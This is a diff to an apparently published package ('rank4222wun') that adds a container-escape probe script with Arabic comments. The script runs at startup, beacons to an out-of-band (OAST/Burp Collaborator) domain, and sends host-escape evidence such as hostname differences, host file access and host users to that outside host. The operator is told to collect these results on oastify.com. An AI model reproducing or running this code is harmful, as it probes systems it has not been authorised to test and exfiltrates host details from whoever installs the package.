+  console.log(`   HTTPS Requests: ${evidenceLog.oastResults.httpsCalled ? '✅ تم إرسال' : '❌ لم يتم'}`);
+  console.log(`   Total Interactions: ${evidenceLog.oastResults.interactions.length}`);
+  if (evidenceLog.oastResults.interactions.length > 0) {
+    console.log(`   Last Interaction: ${evidenceLog.oastResults.interactions[evidenceLog.oastResults.interactions.length - 1].type} at ${evidenceLog.oastResults.interactions[evidenceLog.oastResults.interactions.length - 1].timestamp}`);
   }
-  console.log("=".repeat(70));
-  // عرض مختصر للأدلة إذا كان هناك هروب
-  if (escapeConfirmation.verificationResults.escapedToHost) {
-    console.log("\n📋 ملخص الأدلة القاطعة:");
-    console.log("1. hostname مختلف بين الحاوية والمضيف");
-    console.log("2. الوصول لملفات نظام المضيف");
-    console.log(`3. ${escapeConfirmation.escapeEvidence.successfulMethods.length} طريقة هروب ناجحة`);
-    if (escapeConfirmation.hostSystem.users.length > 0) {
-      console.log("4. يمكن قراءة مستخدمي المضيف");
-    }
+  // حفظ التقرير محلياً
+  const reportFilename = `/tmp/container-escape-oast-report-${evidenceLog.sessionId}.json`;
+  fs.writeFileSync(reportFilename, JSON.stringify(evidenceLog, null, 2));
+  console.log(`\n💾 التقرير الكامل محفوظ في: ${reportFilename}`);
+  // تعليمات التحقق من OAST
+  console.log("\n" + "=".repeat(80));
+  console.log("🔍 كيفية التحقق من النتائج في OAST:");
+  console.log("=".repeat(80));
+  console.log("\n1. اذهب إلى: https://app.oastify.com (أو أداة Burp Collaborator)");
+  console.log(`2. أدخل الدومين: ${OAST_CONFIG.domain}`);
+  console.log(`3. ابحث عن Session ID: ${evidenceLog.sessionId}`);
+  console.log("4. ستجد التفاعلات التالية:");
+  console.log("   - DNS requests (إذا نجحت)");
+  console.log("   - HTTP requests (إذا نجحت)");
+  console.log("   - HTTPS POST requests مع أدلة الهروب");
+  console.log("\n5. إذا رأيت HTTPS request تحتوي على:");
+  console.log("   - 'escapedToHost': true ← تأكيد الهروب");
+  console.log("   - 'confidence': >60% ← ثقة عالية");
+  console.log("   - 'proofPoints' ← قائمة بالأدلة");
+  console.log("\n" + "=".repeat(80));
+  if (evidenceLog.finalVerdict.escapedToHost === true) {
+    console.log("🚨 تنبيه أمني: تم تأكيد الهروب من الحاوية!");
+    console.log("📡 تم إرسال الأدلة إلى OAST الخاص بك");
+    console.log("🛡️  يجب اتخاذ إجراءات أمنية فورية");
+  } else if (evidenceLog.finalVerdict.escapedToHost === 'POSSIBLE') {
+    console.log("⚠️  تحذير: هروب محتمل من الحاوية");
+    console.log("📡 تحقق من OAST للأدلة التفصيلية");
+  } else {
+    console.log("✅ الحاوية تبدو معزولة بشكل جيد");
+    console.log("📡 تم إرسال تفاعلات OAST للتحقق");
   }
+  console.log("=".repeat(80));
 }
 // ===================== بدء التشغيل =====================
-console.log("بدء عملية تأكيد هروب الحاوية...\n");
-performBasicChecks();
+console.log("🚀 بدء عملية تأكيد هروب الحاوية مع OAST...");
+console.log(`📡 سيتم إرسال الأدلة إلى: ${OAST_CONFIG.domain}\n`);
+// إرسال ping أولي
+sendOASTInteraction('HTTPS', {
+  checkPoint: 'tool_start',
+  evidence: {
+    tool: 'ContainerEscapeConfirmation',
+    version: '2.0',
+    timestamp: new Date().toISOString()
+  }
+});
+// بدء التحقق
+setTimeout(detectContainerEnvironment, 1000);

package/rank4222wun-1.0.34.tgz ADDED Viewed

Binary file

package/rank4222wun-1.0.32.tgz DELETED Viewed

Binary file

package/rank4222wun-1.0.33.tgz DELETED Viewed

Binary file